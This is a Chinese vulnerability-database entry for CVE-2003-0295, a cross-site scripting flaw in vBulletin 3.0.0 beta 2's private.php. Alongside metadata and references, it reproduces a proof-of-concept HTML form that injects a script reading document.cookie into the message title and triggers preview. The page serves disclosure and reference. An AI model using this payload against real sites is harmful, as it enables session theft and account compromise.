vBulletin private.php跨站脚本攻击漏洞-安全小百科

vBulletin private.php跨站脚本攻击漏洞

漏洞ID	1107326	漏洞类型	跨站脚本
发布时间	2003-05-14	更新时间	2003-06-16
CVE编号	CVE-2003-0295	CNNVD-ID	CNNVD-200306-086
漏洞平台	PHP	CVSS评分	6.8

|漏洞来源

https://www.exploit-db.com/exploits/22599
https://www.securityfocus.com/bid/82835
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200306-086

|漏洞详情

vBulletin3.0.0测试2版本private.php存在跨站脚本攻击(XSS)漏洞。远程攻击者借助“预览邮件”性能注入任意web脚本和HTML。

|漏洞EXP

source: http://www.securityfocus.com/bid/7594/info

A vulnerability has been reported in vBulletin 3.0.0 beta 2. The problem is said to occur due to insufficient sanitization of private messages. As a result, an attacker may be capable of embedding malicious HTML or script code within a private message. This code may be interpreted by a legitimate user when previewing the message.

It should be noted that vBulletin 3.0.0 beta 2 is not a public release and has only been made available to a small portion of selected sites. This issue does not affect any public releases of vBulletin. 

<html>
<body>
 <form action="http://[victim]/forum/private.php" method="post"
name="vbform">
  <input type="hidden" name="do" value="insertpm" />
  <input type="hidden" name="pmid" value="" />
  <input type="hidden" name="forward" value="" />
  <input type="hidden" name="receipt" value="0" />

  <input type="text" class="bginput" name="title" value="" size="40"
tabindex="2" />
  <textarea name="message" rows="20" cols="70" wrap="virtual"
tabindex="3"></textarea>
  <input type="submit" class="button" name="sbutton" value="Post Message"
accesskey="s" tabindex="4" />
  <input type="submit" class="button" value="Preview Message" accesskey="p"
name="preview" onclick="this.form.dopreview = true; return
true;this.form.submit()" tabindex="5" >

  <input type="checkbox" name="savecopy" value="1" id="cb_savecopy"
checked="checked" />
  <input type="checkbox" name="signature" value="1" id="cb_signature" />
  <input type="checkbox" name="parseurl" value="1" id="cb_parseurl"
checked="checked" />
  <input type="checkbox" name="disablesmilies" value="1"
id="cb_disablesmilies" />
 </form>
<script>
 //Set Values and Submit
 // You can write your own JS codes
 var xss = ""><script>alert(document.cookie)</script>";
 document.vbform.title.value=xss;
 document.vbform.preview.click();
</script>
</body>
</html>

|受影响的产品

Jelsoft vBulletin 3.0.0 Beta 2

|参考资料

来源:BUGTRAQ
名称:20030514VBulletinPreviewMessage-XSSVuln
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105292832607981&w;=2
来源:BUGTRAQ
名称:20030514Re:VBulletinPreviewMessage-XSSVuln
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105293890422210&w;=2

相关推荐: QNX RTOS Watcom Sample Utility Argument Buffer Overflow Vulnerability

QNX RTOS Watcom Sample Utility Argument Buffer Overflow Vulnerability 漏洞ID 1102037 漏洞类型 Boundary Condition Error 发布时间 2002-05-31 更…

文章版权归作者所有，未经允许请勿转载。

THE END